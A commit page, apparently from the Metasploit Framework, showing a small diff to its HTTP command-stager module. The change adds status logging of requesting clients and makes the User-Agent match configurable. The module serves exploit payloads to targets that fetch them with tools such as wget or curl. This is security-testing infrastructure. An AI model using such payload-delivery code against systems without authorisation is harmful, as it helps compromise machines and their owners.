Browse Source

Add prints and better checking to HTTP CmdStagers

Admittedly, this code is more convoluted than it needs to be.
William Vu 2 years ago
parent
commit
27876a91d3
1 changed files with 17 additions and 1 deletions
  1. 17
    1
      lib/msf/core/exploit/cmdstager/http.rb

+ 17
- 1
lib/msf/core/exploit/cmdstager/http.rb View File

@@ -27,9 +27,25 @@ module Http
27 27
   end
28 28
 
29 29
   def on_request_uri(cli, request)
30
-    if request['User-Agent'] =~ /^(?:Wget|curl)/
30
+    client = cli.peerhost
31
+
32
+    if (user_agent = request.headers['User-Agent'])
33
+      client << " (#{user_agent})"
34
+    end
35
+
36
+    print_status("Client #{client} requested #{request.raw_uri}")
37
+
38
+    if stager_instance.respond_to?(:user_agent)
39
+      agent_regex = stager_instance.user_agent
40
+    else
41
+      agent_regex = /.*/
42
+    end
43
+
44
+    if user_agent =~ agent_regex
45
+      print_status("Sending payload to #{client}")
31 46
       send_response(cli, exe)
32 47
     else
48
+      print_status("Sending 404 to #{client}")
33 49
       send_not_found(cli)
34 50
     end
35 51
   end

Loading…
Cancel
Save